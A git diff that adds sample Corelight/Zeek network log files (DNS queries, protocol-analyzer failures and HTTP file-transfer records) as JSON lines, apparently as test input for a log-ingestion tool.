+{"ts":"2018-08-03T23:38:59.307964Z","uid":"CMMvTP2PNc0xC5kWvk","id.orig_h":"192.168.0.51","id.orig_p":48458,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":61429,"query":"password-ned-xp.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.825872Z","uid":"C83b3V1vZIrsJ2P6lg","id.orig_h":"192.168.0.54","id.orig_p":54297,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":13104,"query":"ajax.aspnetcdn.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["mscomajax.vo.msecnd.net","cs1.wpc.v0cdn.net","68.232.34.200"],"TTLs":[2283.0,2203.0,2129.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.938600Z","uid":"COrePssLENSOflB2g","id.orig_h":"192.168.0.51","id.orig_p":49865,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":32153,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.032946Z","uid":"CAdhMq3LBdw6Tw40oj","id.orig_h":"192.168.0.51","id.orig_p":53943,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":16916,"query":"safebrowsing.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.838807Z","uid":"C5KYsNWDVWC2agMPj","id.orig_h":"192.168.0.54","id.orig_p":64649,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":2277,"rcode":3,"rcode_name":"NXDOMAIN","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.056647Z","uid":"CdNU9c2P0uebDBSWo5","id.orig_h":"192.168.0.54","id.orig_p":60416,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":21121,"query":"accounts.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["accounts.l.google.com","216.58.209.141"],"TTLs":[278777.0,262.0],"rejected":false} +{"ts":"2018-08-03T23:38:59.334229Z","uid":"CuKeDJ3zaOcws1t8wi","id.orig_h":"192.168.0.54","id.orig_p":50392,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":31828,"query":"play.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["play.l.google.com","216.58.209.142"],"TTLs":[168.0,168.0],"rejected":false} +{"ts":"2018-08-03T23:39:01.124570Z","uid":"C9ywaY2tEz5PCm2gmi","id.orig_h":"192.168.0.54","id.orig_p":63612,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":3934,"rcode":3,"rcode_name":"NXDOMAIN","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.848581Z","uid":"CHJWCW3g7DUgXOExQg","id.orig_h":"192.168.0.54","id.orig_p":62969,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":8856,"query":"wpad.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.047976Z","uid":"CHJWCW3g7DUgXOExQg","id.orig_h":"192.168.0.54","id.orig_p":62969,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":44335,"query":"safebrowsing-cache.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["safebrowsing.cache.l.google.com","213.155.151.155","213.155.151.148","213.155.151.149","213.155.151.150","213.155.151.151","213.155.151.152","213.155.151.153","213.155.151.154"],"TTLs":[168497.0,276.0,276.0,276.0,276.0,276.0,276.0,276.0,276.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.925904Z","uid":"CXTkCuSnwOyoMNQJa","id.orig_h":"192.168.0.54","id.orig_p":56934,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":2244,"query":"mail.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.852988Z","uid":"CXTkCuSnwOyoMNQJa","id.orig_h":"192.168.0.54","id.orig_p":56934,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":45275,"query":"talkgadget.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} diff --git a/Sample Data/Custom/Corelight/dpd_20180803_16:36:45-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/dpd_20180803_16:36:45-16:40:00-0700.log_ new file mode 100644 index 0000000000..ba831218be --- /dev/null +++ b/Sample Data/Custom/Corelight/dpd_20180803_16:36:45-16:40:00-0700.log_ @@ -0,0 +1,38 @@ +{"ts":"2018-08-03T23:36:45.474560Z","uid":"Cwtn0wFmdvfAXAjS7","id.orig_h":"fe80::1c0d:ca14:bd83:8f34","id.orig_p":5353,"id.resp_h":"ff02::fb","id.resp_p":5353,"proto":"udp","analyzer":"DNS","failure_reason":"DNS_Conn_count_too_large"} +{"ts":"2018-08-03T23:37:17.746854Z","uid":"CeqPSH2UDSc6Agj8zk","id.orig_h":"192.168.0.51","id.orig_p":48217,"id.resp_h":"194.107.151.200","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:37:56.852912Z","uid":"CTulD82uScAfRuKSY1","id.orig_h":"192.168.0.54","id.orig_p":52827,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:56.856578Z","uid":"CGtMst4zjsFe31Znj6","id.orig_h":"192.168.0.54","id.orig_p":52839,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:56.838102Z","uid":"CkoWmDVroQcbvpCL9","id.orig_h":"192.168.0.54","id.orig_p":52799,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:56.847393Z","uid":"CZIT8w3j3WRZVTXkq3","id.orig_h":"192.168.0.54","id.orig_p":52833,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:56.943266Z","uid":"Cv0JmoDlouXUfSe88","id.orig_h":"192.168.0.54","id.orig_p":52845,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:56.968606Z","uid":"CfDeAh3nxakibKxURb","id.orig_h":"192.168.0.54","id.orig_p":52850,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:56.941594Z","uid":"CsDEot4WYoy97AbiY5","id.orig_h":"192.168.0.54","id.orig_p":52846,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:56.941889Z","uid":"Cpz9H132gXW9fNi6U5","id.orig_h":"192.168.0.54","id.orig_p":52844,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:56.864634Z","uid":"CDJH0i3lRQn2lsOTB8","id.orig_h":"192.168.0.54","id.orig_p":52841,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:57.192844Z","uid":"CNNhE634G9Npyu4z7","id.orig_h":"192.168.0.54","id.orig_p":52881,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:56.835639Z","uid":"CF5Unj4axMFn20Qzs1","id.orig_h":"192.168.0.54","id.orig_p":52803,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:57.191642Z","uid":"Cl6Mxo3fwCeTWoRkV2","id.orig_h":"192.168.0.54","id.orig_p":52874,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:57.191642Z","uid":"CIXSbf1cVW9EKoE7Hi","id.orig_h":"192.168.0.54","id.orig_p":52879,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:57.194633Z","uid":"C87Vdw19r8vKA2aht7","id.orig_h":"192.168.0.54","id.orig_p":52875,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:57.194633Z","uid":"CHvjod4fdHp6bsl4S6","id.orig_h":"192.168.0.54","id.orig_p":52878,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:37:57.194186Z","uid":"CjW5rU367lNNRdNEwi","id.orig_h":"192.168.0.54","id.orig_p":52876,"id.resp_h":"54.89.42.30","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:38:05.582168Z","uid":"ClMx5k2To0SpX2U3cl","id.orig_h":"192.168.0.51","id.orig_p":53616,"id.resp_h":"8.20.213.166","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:38:06.772710Z","uid":"CRS0PFMPKEEs2499","id.orig_h":"54.235.163.229","id.orig_p":47256,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:06.883974Z","uid":"CD8s9G2tNNVYTmQkH9","id.orig_h":"54.235.163.229","id.orig_p":53284,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:38:06.883974Z","uid":"CD8s9G2tNNVYTmQkH9","id.orig_h":"54.235.163.229","id.orig_p":53284,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http request line"} +{"ts":"2018-08-03T23:38:06.846239Z","uid":"Ck9XNo1rBw3AhqPrn6","id.orig_h":"54.235.163.229","id.orig_p":50867,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:45.346075Z","uid":"CH75iC32XsUzgVvuJ3","id.orig_h":"192.168.0.54","id.orig_p":56095,"id.resp_h":"111.221.77.165","id.resp_p":443,"proto":"tcp","analyzer":"SSL","failure_reason":"Invalid version in TLS connection. Version: 11976"} +{"ts":"2018-08-03T23:38:45.346075Z","uid":"CH75iC32XsUzgVvuJ3","id.orig_h":"192.168.0.54","id.orig_p":56095,"id.resp_h":"111.221.77.165","id.resp_p":443,"proto":"tcp","analyzer":"SSL","failure_reason":"Invalid version in TLS connection. Version: 11976"} +{"ts":"2018-08-03T23:38:50.450423Z","uid":"CJ5e061gNTfnklZISk","id.orig_h":"192.168.0.53","id.orig_p":1137,"id.resp_h":"85.195.90.199","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:52.308758Z","uid":"CGZWyC4udCFUm1CZHj","id.orig_h":"192.168.0.53","id.orig_p":3401,"id.resp_h":"85.195.90.199","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:56.203820Z","uid":"C2v18s13jw02shLOI6","id.orig_h":"146.52.78.242","id.orig_p":4329,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:56.211410Z","uid":"CuzwQD115sos6GKflc","id.orig_h":"146.52.78.242","id.orig_p":2444,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:56.227677Z","uid":"CKiZuk1Axq1tUnk5B3","id.orig_h":"146.52.78.242","id.orig_p":4653,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:56.229456Z","uid":"Csa0Z73EXyT0QU7kuh","id.orig_h":"146.52.78.242","id.orig_p":3802,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:56.223140Z","uid":"Cdc4dG2bCkm6fpXxNf","id.orig_h":"146.52.78.242","id.orig_p":3935,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:56.203241Z","uid":"CzQqWP3aJDe8zy8TBe","id.orig_h":"146.52.78.242","id.orig_p":4871,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:56.210211Z","uid":"Cw2HA3QMlupOayfhe","id.orig_h":"146.52.78.242","id.orig_p":3416,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:56.210211Z","uid":"Cpn0xm3AxnlqYiMuRh","id.orig_h":"146.52.78.242","id.orig_p":1550,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:56.216550Z","uid":"CwDrWLqZ4CoapKe15","id.orig_h":"146.52.78.242","id.orig_p":2482,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:56.206022Z","uid":"CunqCs2VofincaO988","id.orig_h":"146.52.78.242","id.orig_p":3574,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} +{"ts":"2018-08-03T23:38:56.226589Z","uid":"CgYzka2SoJ8Zl9axf4","id.orig_h":"146.52.78.242","id.orig_p":2334,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"tcp","analyzer":"HTTP","failure_reason":"not a http reply line"} diff --git a/Sample Data/Custom/Corelight/files_20180803_16:37:08-16:40:00-0800.log_ b/Sample Data/Custom/Corelight/files_20180803_16:37:08-16:40:00-0800.log_ new file mode 100644 index 0000000000..d57f8621e4 --- /dev/null +++ b/Sample Data/Custom/Corelight/files_20180803_16:37:08-16:40:00-0800.log_ @@ -0,0 +1,200 @@ +{"ts":"2018-08-03T23:37:52.822375Z","fuid":"FMBzmKCY0ffSPHz","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C0QhDN3a5vrrTJsoU5"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:52.822375Z","fuid":"FUyrCiI98XxYJUs8h","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CDFZYk4iJQnTX4d71c"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:53.030042Z","fuid":"FOghmt2dlWFBxae8ge","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CX2RTSZa0U6A9KWh"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:53.327988Z","fuid":"FQ13OR3bIf1gm8m1B2","tx_hosts":["94.31.29.41"],"rx_hosts":["192.168.0.51"],"conn_uids":["CWpSzz33xuduGuwJZg"],"source":"HTTP","depth":0,"analyzers":["SHA256","MD5","SHA1"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":39928,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:53.564872Z","fuid":"FlAkPt23JJFbK0WzLf","tx_hosts":["216.58.209.102"],"rx_hosts":["192.168.0.2"],"conn_uids":["CEuOJ84Fw155ZPfL46"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":29148,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.459368Z","fuid":"Ftb0Bg1t85hGzcEfn2","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C1ZqHi2JMWjWnhJq9f"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.459368Z","fuid":"FxjGOY1FlYWlwd9Pf1","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CW4lLcO8osJJAZGPa"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.459368Z","fuid":"FwMgjKY61yuhYw2D8","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CBzTpIOsNw51dmhv8"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.484612Z","fuid":"FuuF4M6yfVoolbOOd","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CJOgXt4S33xF98xnA4"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.484612Z","fuid":"FR2Srq37OwHPfbHpDl","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CObvHm1YQAZyTPGvz9"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.484612Z","fuid":"F5X2Ba1ZreytrHrOVj","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CGwcKx2j43ojZ5Xye"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":5840,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.484612Z","fuid":"FQ66dG1rFDdhhuXee","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CUHqOC445zIvJ8KxKk"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":10220,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.499785Z","fuid":"FLd21PXL7ZjVVhv2g","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C9P8NS1aULzGCODxBb"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.525071Z","fuid":"FOKVWj4IEeejBmHAS","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C2nOlkP6JB6MM8HS4"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.525071Z","fuid":"F3oIuZ3TsN8rzVfQFa","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cikw5i3YQpURwKRU4a"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.525071Z","fuid":"FfWLLK1UWdGEhxFoSc","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cft2d7359t5L35FHFh"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.525071Z","fuid":"FBd2gc35Wg6QTZ7Dkl","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CpMRdE1e2OsTWFG5Ha"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.170158Z","fuid":"Fcz1yn4u7iDRQcqbZb","tx_hosts":["23.21.60.15"],"rx_hosts":["192.168.0.51"],"conn_uids":["CH2cER3fxUz2VjXJlg"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":1470,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.468232Z","fuid":"F2dEWc3zvH4qdzVqLc","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cn8kDd3m4WSOhRYDp1"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.498551Z","fuid":"F2UOplTLxB7P5okhj","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CMc3yq3XGHj5OxWD99"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.513737Z","fuid":"FfuSHu1VcZdBIHuFN6","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Csqa8V1XqL765WsIJc"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.533887Z","fuid":"FlyO6W3sqlKjTFXJO2","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CcnpKp4sFIv5IUfRj3"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.171903Z","fuid":"FG8qEEDge8oYZE1w2","tx_hosts":["23.21.60.15"],"rx_hosts":["192.168.0.51"],"conn_uids":["CmTzQ44ClgysXAQ6Q3"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":524,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.495445Z","fuid":"FOI9nn2BKZRvD0nJc6","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CSOCVPVOUIXiFndE7"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":11680,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.510664Z","fuid":"F3jvUG2awlO2X2XQmh","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CxAyzO2P0cVXC5t1S4"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.510664Z","fuid":"F1aH1GFYsNDtdkfib","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CMNT6W1jJnAl2BIfwi"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":11680,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.510664Z","fuid":"FMiJOb3ncP1Bntyrub","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CEAoJH2Zl1hXkJctLl"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.525868Z","fuid":"Fd47Sh1bLtfercIUG3","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CFTBeG2tD5d4OYiS3c"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.535958Z","fuid":"FJsVHT1bjjTYKW5Wj6","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CMwzRl3JVzRh6qPBE7"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":10220,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.657364Z","fuid":"FVBRgm4BCAt8UJ7fOk","tx_hosts":["216.58.209.132"],"rx_hosts":["192.168.0.51"],"conn_uids":["C6KxvA4oJZyxu9xzhd"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.113373Z","fuid":"FyqZjE2SZXgVMK3tlh","tx_hosts":["23.21.60.15"],"rx_hosts":["192.168.0.51"],"conn_uids":["C5NaTh4dI1sPzedZGl"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":4164,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.123478Z","fuid":"FyRgkbKpdB2mZlZvk","tx_hosts":["104.28.4.112"],"rx_hosts":["192.168.0.51"],"conn_uids":["CCgcsx4Z2cFvHBZwT8"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":5600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.451854Z","fuid":"FJNjISewcuHcrjlaa","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cs5KAL3vQRopmS6Je6"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} 